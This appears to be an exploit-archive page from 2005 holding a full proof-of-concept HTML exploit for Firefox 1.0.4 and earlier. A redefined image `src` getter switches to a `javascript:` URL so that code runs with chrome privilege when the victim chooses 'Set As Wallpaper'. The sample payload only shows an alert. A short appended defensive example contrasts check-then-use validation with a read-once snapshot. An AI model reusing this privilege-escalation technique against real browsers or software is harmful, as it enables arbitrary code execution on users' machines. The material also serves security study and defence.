


2005-07-12 Mozilla Firefox <= 1.0.4 "IMG" Elements Code Execution Exploit
Rated as: Critical

// Exploit by moz_bug_r_a4
<?xml version="1.0"?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
IMG {
display: block;
width: 96px; height: 96px;
border: 1px solid #f00;
/*background-image:
url("http://www.mozilla.org/images/mozilla-16.png");*/
background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUg
AAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29md
HdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAHWSURBVHjaYvz//z8DJQAg
gJiQOe/fv2fv7Oz8rays/N+VkfG/iYnJfyD/1+rVq7ffu3dPFpsBAAHEAHIBCJ85c8bN
2Nj4vwsDw/8zQLwKiO8CcRoQu0DxqlWrdsHUwzBAAIGJmTNnPgYa9j8UqhFElwP
xf2MIDeIrKSn9FwSJoRkAEEAM0DD4DzMAyPi/G+QKY4hh5WAXGf8PDQ0FGwJ2
2d27CjADAAIIrLmjo+MXA9R2kAHvGBA2wwx6B8W7od6CeQcggKCmCEL8bgwx
YCbUIGTDVkHDBia+CuotgACCueD3TDQN75D4xmAvCoK9ARMHBzAw0AECiBH
kAlC0Mdy7x9ABNA3obAZXIAa6iKEcGlMVQHwWyjYuL2d4v2cPg8vZswx7gHyAA
AK7AOif7SAbOqCmn4Ha3AHFsIDtgPq/vLz8P4MSkJ2W9h8ggBjevXvHDo4FQUQ
g/kdypqCg4H8lUIACnQ/SOBMYI8bAsAJFPcj1AAEEjwVQqLpAbXmH5BJjqI0gi9D
TAAgDBBCcAVLkgmQ7yKCZxpCQxqUZhAECCJ4XgMl493ug21ZD+aDAXH0WL
M4A9MZPXJkJIIAwTAR5pQMalaCABQUULttBGCCAGCnNzgABBgAMJ5THwGvJL
AAAAABJRU5ErkJggg==");
}
</style>
</head>

<body>
<h3>Arbitrary code execution via setWallpaper()</h3>
<pre>
1. Right click on the image.
2. Choose "Set As Wallpaper..." from the context menu.

A dialog that shows Components.stack will appear.
</pre>

<IMG id="i"/>

<script>
<![CDATA[
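// sx: which read of |src| (counted from the last contextmenu event) is the
// first to get u[1]; the count depends on the build date in productSub
var sx = navigator.productSub < 20050622 ? 2 : 4;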

// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);";
var evalCode = code.replace(/'/g, '"').replace(/\\/g, '\\\\');

var u = [ "http://www.mozilla.org/images/mozilla-16.png",
"javascript:eval('" + evalCode + "')" ];

var sc = 0;
var i = document.getElementById("i");
i.addEventListener("contextmenu", function(e) { sc = 0; }, false);
i.__defineGetter__("src", function() {
//return (confirm(++sc)) ? u[0] : u[1];
return (++sc < sx) ? u[0] : u[1];
});
]]>
</script>

</body>
</html>
securitydot.net - 2005-07-12
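
The `src` getter in the script above answers early reads with an image URL and later reads with a `javascript:` URL, so a caller that validates one read and acts on another never checks the value it uses. The block below is an added example, not part of the original page and not Mozilla's fix, showing that check-then-use pattern beside a read-once variant; `makeFlippingNode`, `checkThenUse`, `snapshotImageURL` and the http(s)-only allowlist are hypothetical names and assumptions.

```javascript
// Added illustration; all names here are hypothetical.
// Assumption: only http(s) image sources are acceptable to the privileged caller.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

function schemeAllowed(raw) {
  try {
    return ALLOWED_SCHEMES.has(new URL(raw).protocol);
  } catch (e) {
    return false; // not an absolute URL
  }
}

// Constructed stand-in for a content-controlled node: like the getter on the
// page, "src" yields `benign` until read number `flipAt`, then `later`.
function makeFlippingNode(benign, later, flipAt) {
  let reads = 0;
  const node = {};
  Object.defineProperty(node, "src", {
    get() { return (++reads < flipAt) ? benign : later; }
  });
  return node;
}

// Weak pattern: validates one read of node.src, then acts on a second read.
function checkThenUse(node) {
  return schemeAllowed(String(node.src)) ? String(node.src) : null;
}

// Hardened pattern: read once, validate that snapshot, return only the snapshot.
function snapshotImageURL(node) {
  const raw = String(node.src); // the only read of the property
  return schemeAllowed(raw) ? new URL(raw).href : null;
}

const benign = "http://www.mozilla.org/images/mozilla-16.png";
const later = "javascript:void(0)"; // constructed, harmless value
console.log(checkThenUse(makeFlippingNode(benign, later, 2)));     // unchecked value
console.log(snapshotImageURL(makeFlippingNode(benign, later, 2))); // validated value
```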
